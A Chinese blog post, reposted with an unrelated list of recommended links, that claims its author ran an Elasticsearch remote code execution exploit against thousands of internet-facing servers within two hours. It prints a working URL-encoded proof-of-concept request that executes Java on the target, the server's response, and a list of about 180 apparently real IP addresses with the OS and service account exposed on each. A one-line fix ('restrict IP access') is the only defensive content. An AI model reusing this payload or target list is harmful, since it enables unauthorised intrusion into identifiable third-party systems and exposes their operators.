25000linux集群危机怎么样,我是如何在2小时内组建5000+集群服务器僵尸网络的
由于Elasticsearch命令执行漏洞,导致上万服务器受影响,截图所有ip无重复。2小时之内顺利在5000多台服务器上执行相关命令。
本次仅是技术测试漏洞影响范围,标题党了。国内测试700台集群服务器,成功了170多台。所有测试当中仅测试了1.4w ip成功率接近50%.漏洞证明:
执行POC:http://xx.xx.xx.xx:9200/_search?source={%22size%22:1,%22query%22:{%22filtered%22:{%22query%22:{%22match_all%22:{}}}},%22script_fields%22:{%22exp%22:{%22script%22:%22String%20str%3DSystem.getProperty(\%22os.name\%22)%2b\%22-\%22%2bSystem.getProperty(\%22user.name\%22);\%22[os:\%22%2bstr.toString()%2b\%22/]\%22;%22}}}
结果如下:
{"took":7,"timed_out":false,"_shards":{"total":5,"successful":5,"failed":0},"hits":{"total":140847,"max_score":1.0,"hits":[{"_index":"cai","_type":"loganalysis","_id":"f2bb7c30-ab55-11e3-9940-22000a9a8b23","_score":1.0,"fields":{"exp":"[os:Linux-ec2-user/]"}}]}}
返回了当前操作系统类型和当前用户运行Elasticsearch的用户名。
国内受影响IP:114.112.172.45:Linux-elasticsearch
60.190.240.74:Linux-admin
218.247.15.110:Linux-root
119.254.106.156:Linux-root
112.124.6.156:Linux-root
112.65.228.5:Linux-yxtuser
112.124.68.214:Linux-root
183.129.178.138:Linux-admin
123.127.114.28:Linux-root
123.127.114.32:Linux-root
114.113.156.235:Linux-root
210.26.182.133:Windows Server 2008 R2-tlm
183.60.244.17:Linux-admin
124.248.40.56:Linux-elasticsearch
115.29.160.208:Linux-elasticsearch
222.180.136.70:Linux-logbase
123.125.105.198:Linux-root
59.175.153.24:Linux-root
210.14.154.135:Linux-yada
118.186.12.154:Linux-root
219.232.240.226:Linux-spider
210.34.4.113:Linux-neversion
59.175.153.28:Linux-root
115.29.221.214:Linux-root
202.204.32.142:Windows Server 2008-Administrator
42.96.147.212:Linux-elasticsearch
210.192.125.137:Linux-elasticsearch
114.80.158.118:Linux-webuser
121.192.191.166:Linux-neversion
166.111.135.27:Linux-elasticsearch
219.223.190.244:Linux-root
42.62.26.149:Linux-elasticsearch
101.251.193.21:Linux-root
218.200.15.238:Linux-root
115.28.42.126:Linux-elasticsearch
113.107.226.170:Linux-root
218.205.65.249:Linux-admin
210.14.137.102:Linux-elasticsearch
111.11.197.146:Linux-root
117.27.143.230:Linux-dev
42.96.194.176:Linux-root
115.29.188.127:Linux-elasticsearch
115.29.145.164:Linux-elasticsearch
210.26.182.134:Windows Server 2008 R2-tlm
112.124.68.10:Linux-root
210.192.125.141:Linux-elasticsearch
101.251.193.22:Linux-root
202.91.235.47:Linux-doit
180.153.154.140:Linux-elasticsearch
115.28.151.48:Linux-tomcat7
218.108.129.141:Linux-www
219.140.191.206:Linux-root
210.14.154.136:Linux-yada
203.195.193.90:Linux-elasticsearch
61.164.118.194:Linux-root
60.190.1.83:Windows Server 2008 R2-WIN-AR35FQEMOPC$
202.194.7.250:Linux-root
221.6.207.222:Linux-mota
219.136.249.94:Linux-elasticsearch
121.199.19.79:Linux-elasticsearch
210.5.152.69:Linux-elasticsearch
61.152.123.139:Linux-root
115.29.32.56:Linux-root
121.52.229.225:Linux-root
122.224.243.172:Windows Server 2008 R2-IWEB12$
222.192.61.8:Windows Server 2008 R2-WIN-KFLPLV06RH2$
180.153.177.169:Windows Server 2008 R2-Administrator
202.114.177.32:Linux-elasticsearch
211.153.33.201:FreeBSD-root
103.29.133.165:Linux-admin
211.155.229.2:Linux-doit
42.159.7.88:Linux-elasticsearch
202.192.149.91:Linux-elasticsearch
123.150.207.181:Linux-elasticsearch
202.197.77.3:Linux-root
114.80.158.119:Linux-webuser
220.231.128.242:Linux-root
114.80.158.117:Linux-webuser
59.175.153.94:Linux-root
124.207.188.72:Linux-elasticsearch
121.52.232.27:Linux-admin
202.99.230.148:Linux-elasticsearch
210.32.158.117:Windows Server 2008-Administrator
121.52.213.92:Linux-tankai
222.192.61.9:Windows Server 2008 R2-WIN-FBH6CANACHV$
175.102.33.122:Linux-root
211.155.86.118:Linux-elasticsearch
61.164.112.9:Linux-root
210.73.221.26:Linux-elasticsearch
124.127.201.53:Windows Server 2008 R2-Administrator
118.193.128.202:Linux-root
59.151.86.9:Windows Server 2008 R2-cobazaaradmin
202.192.149.90:Linux-elasticsearch
123.101.0.77:Linux-es
218.94.42.3:Windows 2003-SYSTEM
125.210.209.154:Linux-ec
58.215.139.124:Linux-root
121.199.41.168:Linux-site
60.194.51.18:Linux-elasticsearch
210.51.190.22:Linux-root
180.153.224.122:Linux-root
119.2.0.195:Linux-wubin
166.111.7.105:Linux-aminer
42.96.168.215:Linux-medium
218.108.28.133:Linux-root
121.199.31.235:Linux-elasticsearch
124.207.188.106:Linux-elasticsearch
112.124.103.71:Linux-elasticsearch
121.199.14.195:Linux-elasticsearch
183.129.160.157:Linux-root
59.61.77.4:Linux-elasticsearch
124.95.161.235:Linux-elasticsearch
183.63.149.105:Linux-elasticsearch
118.122.124.188:Linux-elasticsearch
223.4.146.165:Windows Server 2008 R2-WHZD011249$
210.34.4.74:Linux-badboy
202.197.77.1:Linux-root
124.207.188.104:Linux-elasticsearch
218.17.162.90:Windows 2003-SYSTEM
124.248.40.55:Linux-elasticsearch
59.175.153.37:Linux-root
42.62.30.204:Linux-elasticsearch
121.194.2.202:Linux-elasticsearch
62.141.60.253:Linux-elasticsearch
59.106.177.123:Linux-elasticsearch
85.158.182.229:Linux-elasticsearch
162.243.52.4:Linux-elasticsearch
50.97.245.37:Linux-data
192.3.17.46:Linux-root
46.252.21.82:Linux-elasticsearch
95.128.179.92:Linux-elasticsearch
54.199.202.180:Linux-elasticsearch
54.72.186.95:Linux-elasticsearch
184.69.206.134:Linux-elasticsearch
107.170.149.193:Linux-elasticsearch
138.91.191.171:Windows Server 2012-ECOSEARCH$
77.120.101.131:Linux-elasticsearch
95.85.30.247:Linux-elasticsearch
62.210.239.230:Linux-elasticsearch
23.253.35.234:Linux-elasticsearch
85.25.100.198:Linux-elasticsearch
162.243.6.243:Linux-elasticsearch
115.28.153.62:Linux-ringtone
82.95.165.31:Linux-elasticsearch
54.204.149.163:Linux-elasticsearch
206.221.150.100:Linux-elasticsearch
218.241.236.109:Linux-lda
199.80.52.216:Linux-elasticsearch
62.210.215.14:Linux-elasticsearch
46.36.216.71:Linux-elasticsearch
54.255.38.134:Linux-deploy
54.72.78.222:Linux-elasticsearch
162.242.241.223:Linux-elasticsearch
54.251.248.168:Linux-elasticsearch
217.67.30.84:FreeBSD-elasticsearch
89.31.96.201:Linux-elasticsearch
151.236.216.20:Linux-elasticsearch
95.142.163.212:Linux-elasticsearch
23.253.125.187:Linux-elasticsearch
208.94.234.177:Linux-elasticsearch
162.243.37.251:Linux-elasticsearch
178.33.253.101:Linux-julien
178.211.56.101:Windows Server 2008 R2-WIN-ROLMAN9Q7K6$
107.178.214.245:Linux-elasticsearch
46.252.21.183:Linux-elasticsearch
78.140.183.200:SunOS-root
153.121.43.197:Linux-elasticsearch
54.72.222.1:Linux-elasticsearch
162.13.184.118:Linux-elasticsearch
178.170.104.38:Linux-elasticsearch
54.221.61.224:Linux-elasticsearch
54.196.20.198:Linux-elasticsearch
23.253.170.86:Linux-elasticsearch
94.23.222.203:Linux-root
修复方案:
限制ip访问
25000linux集群危机怎么样,我是如何在2小时内组建5000+集群服务器僵尸网络的相关推荐
- 引导分区 pbr 数据分析_如何在1小时内引导您的分析
引导分区 pbr 数据分析 by Tim Abraham 蒂姆·亚伯拉罕(Tim Abraham) 如何在1小时内引导您的分析 (How to bootstrap your analytics in ...
- 如何在24小时内0成本获取到25000+精准粉丝的?
今天看到一篇干货分享文章:<如何在24小时内0成本获取到25000+精准粉丝的?>,阿泽特意分享出来,希望对大家有帮助.好了,上干货: 前言:最近做了一个公众号,试水推了一个分享链接得资源 ...
- 如何在2小时内用1块钱赚到100块钱?
本文来源:道君说财(微信公众号:touzijuiebu) 这篇文章将会告诉大家,如何跳出自己的思维去看待问题.跳出思维的盒子,你的生活也会增加许多可能性. 如何在2小时内用1块钱赚到100块钱? 别担 ...
- 我是如何在12周内由零基础成为一名程序员的——谨以此文激励自己!!!
我的故事 在海军陆战队服役超过10年后,我于去年7月份退役了.随后在8月份找到了一份赌场的工作做公关,到今年2月中旬的时候又被辞退了.到5月中旬的时候我在DE协会找到了一份临时的"初级用户体 ...
- 我是如何在 10 分钟内搞砸 IT 面试的
最近,我差点儿就拿下了 FAMGA(CSDN 编者注:国内有 BAT,国外有 FAMGA,即 Facebook.Apple.Microsoft.Google.Amazon.)的工作机会.通过了电话面试 ...
- 佳能相机照片误删怎么恢复?看看我是如何在10分钟内解决的
佳能相机照片误删怎么恢复?说起相机的演变还真是一段辛酸史,从最开始使用胶卷才能拍照的相机随着技术的成熟不停发展,集机械.电子及光学的佳能相机腾空出世,无需胶卷,通过光学成像的原理形成影像并记录在相机的 ...
- 如何在2小时内快速入门彩铅
BY:铃铛子 铃铛子拍摄的手绘视频 一.基础认知 对于想要入门彩铅的小伙伴,我认为有两件事要掌握,一是素描元素,二是排线的笔感. A.素描的基础知识 图片选自网络 三大面五大调 三大面:亮面.灰面.暗 ...
- 我如何在20小时内为AWS ML专业课程做好准备并进行破解
I am a great fan of how Tesla is executing the problem of gathering data from the fleet of cars to t ...
- ppt设置外观样式_这个3000多页的PPT是如何在1小时内做好的?
之前制作了一个高考考试大纲词汇课件(2019高考英语考试大纲3500词课件,每页1词(含汉语释义.例句.星级)),每页一个词,高考大纲词汇共有3500左右,所以整个PPT有3000多页 每一页的样式都 ...
最新文章
- pandas.DataFrame.iloc的使用
- Delphi识别读取验证码
- zabbix网络发现主机
- mybatis学习(51):扩展集
- 【Luogu P2781】 传教
- c语言规定 程序中用到的变量一定要,C语言为什么要规定对所用到的变量要“先定义,后使用”...
- PHP 设计模式 笔记与总结(3)SPL 标准库
- Tensorflow初入门
- Go 远超 Python,机器学习人才极度稀缺,全球 16,655 位程序员告诉你这些真相!...
- 2017蓝桥杯B组:最长公共子序列(动态规划详解(配图))
- 移动开发语言Swift
- 洛谷P3952 时间复杂度
- html5中drag//drop拖曳效果的用法
- lumisoft.net 邮件管理系列文章 - 如何判断附件为内嵌式还是附加式
- SAP动态下载数据库表数据至EXCEL
- tomcat配置前台访问日志记录
- Chrome浏览器必备插件推荐
- bim综合软件:一次性快速解锁所有轴网,生成轴网
- PCIE高性能RAID固态存储卡
- 为什么说“仁者不忧”?